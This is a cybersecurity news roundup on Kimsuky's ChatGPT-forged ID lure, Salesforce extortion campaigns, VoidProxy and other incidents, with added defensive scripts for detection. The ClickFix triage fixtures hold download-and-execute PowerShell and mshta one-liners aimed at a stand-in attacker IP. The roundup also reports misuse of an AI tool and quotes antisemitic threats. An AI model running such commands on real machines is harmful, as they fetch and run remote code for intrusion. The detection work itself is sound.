DPRK's Kimsuky forged a deepfake military ID using ChatGPT for S. Korean attack

Vastaamo hacker who released psychotherapy center records is set free, FBI issues warning of UNC6040 and UNC6395 targeting Salesforce users, Shiba Inu stopped damage from attack, DC AG charges Athena ATM operator for ignoring elderly scams, much more

Kimsuky attack scenario. Source: Genians.


South Korean cybersecurity firm Genians reports that the suspected North Korean state-sponsored hacking group called Kimsuky used ChatGPT to create a deepfake of a military ID document to attack a target in South Korea.

Attackers used the AI tool to draft a realistic-looking image of a South Korean military identification card, intended to make a phishing email seem more credible.

Instead of including the real image, the email linked to malware capable of extracting data from recipients' devices, according to Genians.

Kimsuky is a suspected North Korea-sponsored cyber-espionage unit previously linked to other spying efforts against South Korean targets. The US Department of Homeland Security said Kimsuky “is most likely tasked by the North Korean regime with a global intelligence-gathering mission,” according to a 2020 advisory.

Genians previously released the "ClickFix Tactics Analysis Report" in early July. That report included lures disguised as the security functions of South Korean portal companies.

In that campaign, the threat actors dressed up a lure as the CAPTCHA (reCAPTCHA) check of a South Korean portal company. Victims who followed the pop-up window's instructions ran malicious PowerShell commands on their own machines.

Genians' threat analysts confirmed that the same malware used at that time was also employed in the current deepfake attack impersonating the defense sector. (Jane Lanhee Lee / Bloomberg and Genians)
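The ClickFix pattern described above leaves a recognisable trace: the victim opens the Run dialog, pastes a one-liner and presses Enter, so the interpreter is a child of explorer.exe and the command line carries download and evasion switches, and the pasted text is kept in the per-user RunMRU registry key. The triage below is an added example written for this page, not code from Genians or from the campaign; the telemetry rows, the RunMRU values, the IP addresses and the scoring thresholds are all constructed, and the heuristics are assumptions rather than published detection logic.

```python
"""Heuristic triage for ClickFix-style executions (added example, not Genians' code).

Records are constructed in the shape of Sysmon Event ID 1 / Windows 4688 fields;
the RunMRU dict mirrors the values under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
"""
import re

# Interpreters and LOLBins commonly pasted into the Run dialog.
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|msiexec)(\.exe)?\b", re.I)

# Traits of a pasted one-liner; each hit adds one point (thresholds are assumptions).
TRAIT_RES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|certutil)\b|https?://",
        re.I),
    "exec_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass|\biex\b|invoke-expression", re.I),
}


def triage_event(event: dict) -> dict:
    """Score one process-creation record; 2 or more points is worth an analyst's look."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    traits = [name for name, rx in TRAIT_RES.items() if rx.search(cmd)]
    # Win+R launches are children of explorer.exe. On its own that is weak
    # evidence (admins launch PowerShell that way too), so it adds one point
    # only when combined with a LOLBin.
    from_run_dialog = parent.endswith("\\explorer.exe")
    score = len(traits) + (1 if from_run_dialog and LOLBIN_RE.search(cmd) else 0)
    return {"score": score, "traits": traits, "from_run_dialog": from_run_dialog,
            "suspicious": score >= 2}


def runmru_commands(values: dict) -> list:
    """Return Run-dialog history, most recent first.

    MRUList holds the value names in recency order; each stored command
    carries a trailing backslash-1 appended by the shell."""
    out = []
    for name in values.get("MRUList", ""):
        data = values.get(name, "")
        out.append(data[:-2] if data.endswith("\\1") else data)
    return out


def triage_runmru(values: dict) -> list:
    """Apply the same scoring to RunMRU history; the parent is always explorer.exe."""
    return [(cmd, triage_event({"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": cmd}))
            for cmd in runmru_commands(values)]


# Constructed telemetry (203.0.113.0/24 is documentation address space).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iwr http://203.0.113.10/verify.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://203.0.113.10/captcha.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},      # benign admin task
    {"ParentImage": r"C:\Program Files\Git\bin\bash.exe",
     "CommandLine": "curl -sL https://203.0.113.20/setup.sh"},        # dev tooling, not Win+R
]

SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm http://203.0.113.10/c | iex"\\1',
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage_event(ev)["score"], ev["CommandLine"])
    for cmd, verdict in triage_runmru(SAMPLE_RUNMRU):
        print(verdict["suspicious"], cmd)
```

The benign backup script scores one point (explorer.exe parent plus PowerShell) and the developer's curl scores one (download cradle without the Run-dialog parent), so neither crosses the threshold; the two lures score because a Win+R launch, a LOLBin and a download or evasion switch appear together. RunMRU survives after the process has exited, which makes it the artifact to pull during forensics when process telemetry is missing.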

Phishing Email for ClickFix. Source: Kimsuky.

Related: Cryptopolitan, Maeil Business Today, Korea Herald, Telangana Today, Mezha, Research Snipers, Invezz, Business Standard, Business Insider, Tech-Economic Times, The Korea Times, South China Morning Post, NK News, Korea Joong Ang Daily

The Helsinki Court of Appeal ordered the immediate release of Aleksanteri Kivimäki, who had been serving a six-year prison sentence after being convicted of orchestrating a severe data breach of the Vastaamo psychotherapy center.

As the appeal court began hearing the case in August of this year, his lawyer, Peter Jaari, demanded Kivimäki's release, saying that his client risked being imprisoned longer than his sentence if the appeal court changes the duration of his prison term.

If that were to occur, the state would be liable to pay Kivimäki compensation for the excess prison time.

Following an international search, Kivimäki was initially detained in February 2023. After a lengthy trial at Helsinki District Court, Kivimäki was handed a six-year and three-month prison sentence in April 2024 for charges related to the hacking of psychotherapy centre Vastaamo's patient database.

The charges he was found guilty of included aggravated data breach, almost 9,600 counts of aggravated invasion of privacy related to the dissemination of information, more than 21,300 counts of attempted aggravated extortion, and 20 counts of aggravated blackmail.

During the trial, the court heard how Kivimäki hacked into the firm's database, containing the personal information of an estimated 33,000 people, in autumn 2018. A couple of years later, he allegedly attempted to extort money from both Vastaamo and its clients.

There were more victims in the case than in any other in Finnish criminal history.

During the trial, a lawyer representing some of the affected patients told the court that a number of the victims had died by suicide after their patient records had been stolen and used in extortion attempts. (YLE News)

Related: BankInfoSecurity, The Record, Helsinki Times

The FBI issued a FLASH alert warning that two threat clusters, tracked as UNC6040 and UNC6395, are compromising organizations’ Salesforce environments to steal data and extort victims.

"The Federal Bureau of Investigation (FBI) is releasing this FLASH to disseminate Indicators of Compromise (IOCs) associated with recent malicious cyber activities by cyber criminal groups UNC6040 and UNC6395, responsible for a rising number of data theft and extortion intrusions," reads the FBI's FLASH advisory.

"Both groups have recently been observed targeting organizations' Salesforce platforms via different initial access mechanisms. The FBI is releasing this information to maximize awareness and provide IOCs that recipients may use for research and network defense."

UNC6040 was first disclosed by Google Threat Intelligence (Mandiant) in June, which warned that since late 2024, threat actors had been using social engineering and vishing to trick employees into connecting malicious Salesforce Data Loader OAuth apps to their company's Salesforce accounts.

While the FBI did not name the groups behind these campaigns, the ShinyHunters extortion group claimed that they and other threat actors calling themselves "Scattered Lapsus$ Hunters" were behind both clusters of activity.

This group of hackers claims to have emerged from, and overlap with, the Lapsus$, Scattered Spider, and ShinyHunters extortion groups. (Lawrence Abrams / Bleeping Computer)
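The entry point described above is a user who is talked into authorizing an OAuth app, so the place to look is the org's OAuth grant records and the logins those grants produce. The script below is an added example written for this page, not tooling from the FBI, Mandiant or Salesforce. The field names are assumed to follow the OauthToken and LoginHistory objects as exported from Salesforce (including "Remote Access 2.0" as the login type for OAuth flows); the rows, app names, allowlist, corporate IP ranges and thresholds are all constructed.

```python
"""Triage of Salesforce OAuth grants for rogue Data Loader-style apps (added example).

Field names are assumed to follow Salesforce's OauthToken and LoginHistory objects;
every row, name, network range and threshold below is constructed.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

NOW = datetime(2025, 9, 12, 9, 0, 0)                          # constructed reference time
APPROVED_APPS = {"Dataloader Bulk", "Salesforce Inspector"}   # assumed allowlist
CORP_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("203.0.113.0/24")]

OAUTH_TOKENS = [  # constructed, in the shape of OauthToken rows
    {"Id": "0Jb000001", "UserId": "005A", "AppName": "Dataloader Bulk",
     "CreatedDate": "2025-09-10T14:02:00Z", "UseCount": 412},
    {"Id": "0Jb000002", "UserId": "005B", "AppName": "Support Ticket Loader",
     "CreatedDate": "2025-09-09T11:30:00Z", "UseCount": 950},
    {"Id": "0Jb000003", "UserId": "005C", "AppName": "Salesforce Inspector",
     "CreatedDate": "2025-03-01T08:00:00Z", "UseCount": 19},
]
LOGIN_HISTORY = [  # constructed, in the shape of LoginHistory rows
    {"UserId": "005A", "Application": "Dataloader Bulk", "LoginType": "Remote Access 2.0",
     "Status": "Success", "SourceIp": "198.51.100.7", "LoginTime": "2025-09-10T14:03:00Z"},
    {"UserId": "005B", "Application": "Support Ticket Loader", "LoginType": "Remote Access 2.0",
     "Status": "Success", "SourceIp": "10.20.0.15", "LoginTime": "2025-09-09T11:31:00Z"},
    {"UserId": "005C", "Application": "Salesforce Inspector", "LoginType": "Remote Access 2.0",
     "Status": "Success", "SourceIp": "10.20.0.40", "LoginTime": "2025-09-11T16:10:00Z"},
]


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def triage_oauth_grants(tokens, logins, now=NOW, approved=APPROVED_APPS,
                        corp_nets=CORP_NETS, new_days=7, burst=200):
    """Flag grants that are unapproved, heavily used right after creation (the
    bulk-export pattern), or exercised from outside corporate address space.
    A legitimately named app such as Data Loader is still flagged on the other
    two signals, since the actor may simply reuse the real tool."""
    logins_by = defaultdict(list)
    for row in logins:
        if row["Status"] == "Success" and row["LoginType"].startswith("Remote Access"):
            logins_by[(row["UserId"], row["Application"])].append(row)

    findings = []
    for tok in tokens:
        reasons = []
        if tok["AppName"] not in approved:
            reasons.append("app not on the approved list")
        age = now - parse_ts(tok["CreatedDate"])
        if age <= timedelta(days=new_days) and tok["UseCount"] >= burst:
            reasons.append(f"{tok['UseCount']} API uses within {age.days + 1} day(s) of the grant")
        outside = sorted({row["SourceIp"] for row in logins_by[(tok["UserId"], tok["AppName"])]
                          if not any(ipaddress.ip_address(row["SourceIp"]) in n for n in corp_nets)})
        if outside:
            reasons.append("OAuth logins from non-corporate IPs: " + ", ".join(outside))
        if reasons:
            findings.append({"token": tok["Id"], "user": tok["UserId"],
                             "app": tok["AppName"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_oauth_grants(OAUTH_TOKENS, LOGIN_HISTORY):
        print(f["user"], f["app"], "->", "; ".join(f["reasons"]))
```

On the constructed data the genuine Data Loader grant is flagged for a burst of use from a non-corporate address, the renamed app is flagged for being unapproved and for the same burst, and the long-standing Inspector grant passes. Revoking a flagged token is only the first step: the data already exported is gone, which is why the page's extortion angle matters more than the app name.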

Related: IC3, Security Week, IT Pro, Security Affairs, WebProNews

The Shiba Inu development team froze 4.6 million BONE tokens after blockchain security firm PeckShield identified a sophisticated attack targeting the Shibarium bridge infrastructure.

The attackers used a flash loan to acquire 4.6 million BONE tokens and, combined with compromised validator signing keys, gained majority control over the bridge's validator set, which let them attempt to drain assets from the Shibarium ecosystem.

The stolen tokens had been delegated to Validator 1 and remained locked by existing staking restrictions. That limitation gave the development team the window it needed to freeze the tokens and implement emergency measures: the team immediately suspended staking functions and initiated containment procedures, and the safeguard proved instrumental in preventing the complete loss of community assets.

Shiba Inu developers transferred stake manager funds to a hardware wallet secured through multisignature technology. The team launched a thorough audit of all validator keys to assess the extent of the compromise and identify potential vulnerabilities within the system architecture.

Security firms Hexens, Seal 911, and PeckShield are collaborating with the Shiba Inu team to investigate the breach. Law enforcement authorities have been notified about the incident. The development team made an unconventional offer to negotiate with the attackers, promising no legal action and offering a bounty reward in exchange for returning the stolen funds. (Newton Gitonga for Coinpaper)

Related: Forklog, Coindesk, BeInCrypto, Coinspeaker, The Block, OneSafe

Washington, DC, Attorney General Brian L. Schwalb unveiled a lawsuit against Athena Bitcoin, accusing the Bitcoin ATM operator of consistently ignoring scams targeting elderly residents and failing to disclose excessive fees.

The firm, which operates 4,100 Bitcoin ATMs in five countries, was charged with two counts of violating the Consumer Protection Procedures Act through deceptive and unfair trade practices. Athena was also charged with the financial exploitation of vulnerable adults and older people.

"We employ aggressive safety protocols to protect the financial interests of our customers, and we provide robust consumer education to ensure they are well informed of the risks, as well as safe practices, associated with kiosks," a spokesman for Athena said. "Our kiosks employ multiple safeguards, from prominent warnings and daily transaction limits to five separate verification screens designed to stop coerced transactions and confirm that bitcoin currency is going to a wallet that [the customer] owns."

In its first five months of operation within the nation’s capital, 93% of funds deposited into Athena’s kiosks were “the product of outright fraud,” according to a 30-page complaint. In 2023, Americans reported $189 million in losses from scams involving Bitcoin ATMs to the FBI. (André Beganski / Decrypt)

Related: DC Attorney General, Cointelegraph, JD Supra, WUSA, The Washington Informer, WJLA

Source: DC Attorney General Complaint.

According to a new report from the Department of Homeland Security's (DHS) Inspector General, DHS failed to effectively implement the Cyber Incentive program for cyber talent, with federal funds meant for the Cybersecurity and Infrastructure Security Agency used incorrectly.

Instead of being targeted toward valuable talent likely to transition to the private sector, the payments were disbursed generally, with many ineligible employees receiving tens of thousands of dollars in payment. According to the report, 240 employees who didn't hold roles directly related to cybersecurity received payment through the Cyber Incentive program.

The agency's human resources team didn't track who received which payments, exacerbating the problem. More than 300 people also received erroneous back payments.

The investigation was triggered following a hotline complaint sent to the OIG back in 2023. The OIG made eight recommendations to CISA, which concurred with all of them. (Rebecca Heilweil / FedScoop)

Related: DHS OIG, The Record, Infosecurity Magazine, The Register

Privacy-focused email service Proton Mail last month disabled email accounts belonging to journalists reporting on security breaches of various South Korean government computer systems, following a complaint by an unspecified cybersecurity agency.

After a public outcry and multiple weeks, the journalists’ accounts were eventually reinstated. However, the reporters and editors involved still want answers on how and why Proton decided to shut down the accounts in the first place.

Martin Shelton, deputy director of digital security at the Freedom of the Press Foundation, highlighted that numerous newsrooms use Proton’s services as alternatives to something like Gmail “specifically to avoid situations like this,” pointing out that “While it’s good to see that Proton is reconsidering account suspensions, journalists are among the users who need these and similar tools most.” Newsrooms like The Intercept, the Boston Globe, and the Tampa Bay Times all rely on Proton Mail for emailed tip submissions. (Nikita Mazurov / The Intercept)

Related: Slashdot, Cyber Insider, PCMag, WebProNews

French authorities dismantled the "Dark French Anti-System" (DFAS) platform, considered the last French-speaking darknet marketplace, and arrested two men: the alleged creator, born in 1997, and an active contributor, born in 1989.

More than six bitcoins, worth about €600,000, were seized. The investigation, launched in 2023 by the Cyberdouanes unit of the French customs intelligence service DNRED, uncovered more than 12,000 active members and over 110,000 published messages. Cyberdouanes noted steady growth in activity despite earlier takedowns of French-speaking marketplaces, and the site also served as a refuge for former users of previously dismantled platforms.

This operation closes a series of successive dismantlings carried out by French authorities since 2018. (Damien Bancal / Zataz)

Related: RFI

Researchers at Okta exposed a new online fraud service named VoidProxy, a Phishing-as-a-Service (PhaaS) platform that provides the tooling needed to run credential-phishing campaigns.

The platform lets attackers bypass common multi-factor authentication (MFA) methods. It works as an Adversary-in-the-Middle (AitM) proxy, relaying the victim's traffic to the real login page and intercepting passwords, MFA codes, and session material in real time.

VoidProxy is built on a two-part infrastructure designed to evade detection: a disposable front-end and a resilient back-end, so criminals can quickly abandon parts that are discovered while the main system keeps running.

The platform also uses multiple layers of anti-analysis features, including compromised email accounts, redirects, and security checks like Cloudflare CAPTCHA, to make it difficult for security teams to track, which has kept it hidden so far. An admin panel that delivers stolen information in real time, often via Telegram or other online services, shows just how automated the operation is.

The platform was ultimately discovered when it failed to compromise a user protected by Okta’s phishing-resistant authenticator, Okta FastPass, which provided researchers with a key to unravelling the entire scheme. (Deeba Ahmed / HackRead)
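The failure that exposed VoidProxy is the general property of phishing-resistant authenticators: a relayed password or one-time code is indistinguishable from one typed on the real site, while a WebAuthn-style assertion is bound to the page origin and relying-party ID, so a proxy on another domain cannot obtain one the real site will accept. The simulation below is an added example written for this page, not Okta's or VoidProxy's code, and it models the general WebAuthn origin binding rather than FastPass internals. The relying party, user, origins, phishing host, secrets and HOTP counter are constructed, and an HMAC stands in for the credential's asymmetric signature.

```python
"""Why an AitM proxy relays password+OTP logins but not origin-bound WebAuthn.

Added example, not Okta's or VoidProxy's code. Names, origins and keys are
constructed, and an HMAC stands in for the credential's asymmetric signature.
"""
import base64
import hashlib
import hmac
import json
import secrets
import struct

RP_ID = "login.example.com"                                        # constructed relying party
RP_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login-example.com.verify-check.example"    # constructed AitM front-end


def hotp(secret: bytes, counter: int) -> str:
    """RFC 4226 HOTP; the time step is passed in explicitly so runs are repeatable."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    return f"{(struct.unpack('>I', mac[off:off + 4])[0] & 0x7FFFFFFF) % 1_000_000:06d}"


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


class RelyingParty:
    def __init__(self):
        self.user = {"password": "correct-horse", "otp_secret": b"constructed-seed",
                     "cred_key": secrets.token_bytes(32)}   # toy stand-in for the public key
        self.pending = None

    def login_password_otp(self, password: str, code: str, counter: int):
        """Nothing here can tell a relayed code from one typed on the real site."""
        ok = password == self.user["password"] and hmac.compare_digest(
            code, hotp(self.user["otp_secret"], counter))
        return "session-" + secrets.token_hex(8) if ok else None

    def webauthn_challenge(self) -> bytes:
        self.pending = secrets.token_bytes(32)
        return self.pending

    def webauthn_finish(self, client_data_json: bytes, auth_data: bytes, signature: bytes):
        cd = json.loads(client_data_json)
        if cd.get("challenge") != b64u(self.pending):
            return "rejected: stale challenge"
        if cd.get("origin") != RP_ORIGIN:                  # the check an AitM proxy cannot satisfy
            return f"rejected: origin {cd.get('origin')} is not {RP_ORIGIN}"
        if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
            return "rejected: rpIdHash mismatch"
        expected = hmac.new(self.user["cred_key"],
                            auth_data + hashlib.sha256(client_data_json).digest(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, signature):
            return "rejected: bad signature"
        return "session-" + secrets.token_hex(8)


def browser_webauthn(page_origin: str, rp_id: str, challenge: bytes, cred_key: bytes,
                     enforce_rp_id: bool = True):
    """Models the browser: it refuses an rpId that is not the page's host (or a
    parent domain of it) and writes the real page origin into clientDataJSON."""
    host = page_origin.split("://", 1)[1]
    if enforce_rp_id and not (host == rp_id or host.endswith("." + rp_id)):
        return None
    client_data = json.dumps({"type": "webauthn.get", "challenge": b64u(challenge),
                              "origin": page_origin}).encode()
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + b"\x00\x00\x00\x01"
    sig = hmac.new(cred_key, auth_data + hashlib.sha256(client_data).digest(),
                   hashlib.sha256).digest()
    return client_data, auth_data, sig


def aitm_otp_relay(rp: RelyingParty, counter: int = 0):
    """Victim types password and OTP into the phishing page; the proxy relays both."""
    typed = (rp.user["password"], hotp(rp.user["otp_secret"], counter))
    return rp.login_password_otp(*typed, counter)


def aitm_webauthn_relay(rp: RelyingParty, enforce_rp_id: bool = True):
    """Proxy forwards the real challenge to the victim's browser on the phishing origin."""
    challenge = rp.webauthn_challenge()
    result = browser_webauthn(PHISH_ORIGIN, RP_ID, challenge, rp.user["cred_key"], enforce_rp_id)
    if result is None:
        return "browser refused: rpId not valid for " + PHISH_ORIGIN
    return rp.webauthn_finish(*result)


def legit_webauthn(rp: RelyingParty):
    challenge = rp.webauthn_challenge()
    return rp.webauthn_finish(*browser_webauthn(RP_ORIGIN, RP_ID, challenge, rp.user["cred_key"]))


def run_scenarios() -> dict:
    rp = RelyingParty()
    return {"otp_relay": aitm_otp_relay(rp),
            "webauthn_relay": aitm_webauthn_relay(rp),
            "webauthn_relay_no_browser_check": aitm_webauthn_relay(rp, enforce_rp_id=False),
            "legit_webauthn": legit_webauthn(rp)}


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name}: {outcome}")
```

The relayed OTP login yields a session for the proxy. The WebAuthn relay fails twice over: a conforming browser will not even call the authenticator for an rpId that does not match the phishing host, and if that check were somehow bypassed, the signed clientDataJSON would still carry the phishing origin, which the relying party rejects. That second check is the one a proxy operator cannot route around without the credential's private key.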

Related: Okta, CSO Online

VoidProxy admin login page. HackRead.

The Federal Trade Commission announced it is issuing orders to seven companies, including OpenAI, Alphabet, Meta, xAI, and Snap, to understand how their artificial intelligence chatbots potentially negatively affect children and teenagers.

The federal agency said AI chatbots may be used to simulate human-like communication and interpersonal relationships with users, and that it wants to understand what steps these companies have taken to “evaluate the safety of these chatbots when acting as companions,” according to a release.

“Protecting kids online is a top priority for the Trump-Vance FTC, and so is fostering innovation in critical sectors of our economy,” FTC Chairman Andrew Ferguson said in a statement.

The FTC said it is seeking information about how these companies monetize user engagement, develop and approve characters, use or share personal information, monitor and enforce compliance with company rules and terms of service, and mitigate negative impacts, among other subjects. (Ashley Capoot / CNBC)

Related: FTC, SC Media, ZDNET, Fast Company, UNDERCODE NEWS, Mashable

The Uvalde Consolidated Independent School District will close for most of next week after the district detected ransomware in its servers, according to district officials.

The district will close from Sept. 15-18 and will exchange the dates it is closed with other previously scheduled non-working days integrated into the current UCISD calendar.

The ransomware detected by the district is affecting several essential online systems, including phones, thermostats, camera monitoring, and visitor management systems, among other critical services, the district said. Uvalde CISD said these systems are essential to maintain the safety and security of the community it serves.

“We have reported this incident to the FBI, our district’s insurance cybersecurity team, and other relevant agencies,” the district said. (Ivan Herrera / KSAT)

Related: News4 San Antonio, My San Antonio, San Antonio Express News, KABB

An unknown perpetrator hacked five washing machines in a student housing development called the Spinoza Campus in Amsterdam.

For weeks, the hacker took control of the payment system, allowing students to do their laundry for free.

The management company behind the service, DUWO, closed the laundry room in July. More than a thousand students have been unable to do their laundry there. (Toon Meijerink / Folia)

Related: The Register, Tom's Hardware, WebProNews

Israeli Transportation Minister Miri Regev received hundreds of threats and abusive messages from Turkish phone numbers after her mobile number was circulated on X.

“I am Turkish, I will send you to hell,” one message read. Others told her, “Hitler was right, he should have killed you all,” and “We will bury you and your country.” Another sender wrote, “Never forget this, your death is near. We are the defenders of Qassam,” referring to the military wing of Hamas. One demanded, “Be brave and be a man. Come and answer me. You dirty cowardly pigs.”

Regev’s phone number was one of 11 belonging to Israeli ministers that were posted online. The list also included the numbers of former defense minister Yoav Gallant and Prime Minister Benjamin Netanyahu, though it was noted that Netanyahu’s number might be outdated.

Other ministers whose numbers were reportedly exposed include Yariv Levin, Eli Cohen, Dudi Amsalem, Yoav Kisch, Miki Zohar, Avi Dichter, and Nir Barkat.

The wave of harassment followed a cyber incident two days earlier when a Turkish hacking group released the personal number of Foreign Minister Israel Katz and managed to connect with him briefly in a video call. Before Katz disconnected, the hacker shouted curses and captured a screenshot. Katz’s phone was also flooded with thousands of threatening and insulting messages. (Itamar Eichner / Ynet News)

Related: Agencia Nova, Caliber, Arab News, Turkiye Today, Daily Sabah

Vietnamese authorities are warning citizens to be aware of scams in the wake of the country's National Credit Information Center (CIC) breach.

The Criminal Investigation Department of the Ho Chi Minh City Police released a statement noting that scammers could exploit the leaked personal information from CIC to carry out elaborate fraudulent schemes. (Vietnamnet Global)

Related: Saigon News, Tuoi Tre, Vietnam News

Gavin Newsom will have to decide for the second year in a row whether to sign landmark AI safety legislation that could test the ambitious California governor’s ties with the state’s deep-pocketed tech industry.

The bill, which cleared a final vote in the state Legislature in the early hours of Saturday morning, would require AI companies to disclose their safety testing regimes and certify they are following them at a time when many are still wary of the emerging technology.

It could also sow the seeds for a burgeoning national standard on AI safety, given California’s role as the home of the industry and track record for inspiring other states on tech regulation.

Newsom vetoed a similar though more expansive measure last year by the same state senator, San Francisco Democrat Scott Wiener, citing concerns about hampering innovation. (Chase DiFeliciantonio / Politico)

Related: TechCrunch, Maginative, Benzinga, PC Mag, dailyjournal.com, San Francisco Chronicle, Vox, r/California

A California bill to check kids’ ages online is heading to Gov. Gavin Newsom’s desk, after it secured rare support from major tech giants, including Google, Meta, and Snap.

The proposal, which would require device makers and app stores to verify user ages, cleared the state Assembly 58-0 in the early hours of Saturday with backing from Republicans and Democrats.

Google and Meta, plus other tech firms like OpenAI and Pinterest, rallied around the online age verification plan this week despite recently sparring over similar measures in Utah and Texas.

They argue the measure from Democratic state Assemblymember Buffy Wicks offers a more reasonable solution and hope it becomes a de facto national standard for other states weighing mandatory age-checks amid bipartisan concerns about kids’ safety online. (Tyler Katzenberger / Politico)

Related: Engadget, Bloomberg Law, r/Askpolitics

Best Thing of the Day: Take a Bow, Bogdan

Engineer Bogdan Ionescu ran a web server on a disposable vape.

Worst Thing of the Day: Cybercrime's Whack-a-Mole Game Continues

The FBI’s takedown last month of the RapperBot botnet appeared to have an unwanted consequence: freeing up as many as 95,000 devices to be taken over by new botnet overlords. That led to a free-for-all to take over the machines “as fast as possible."
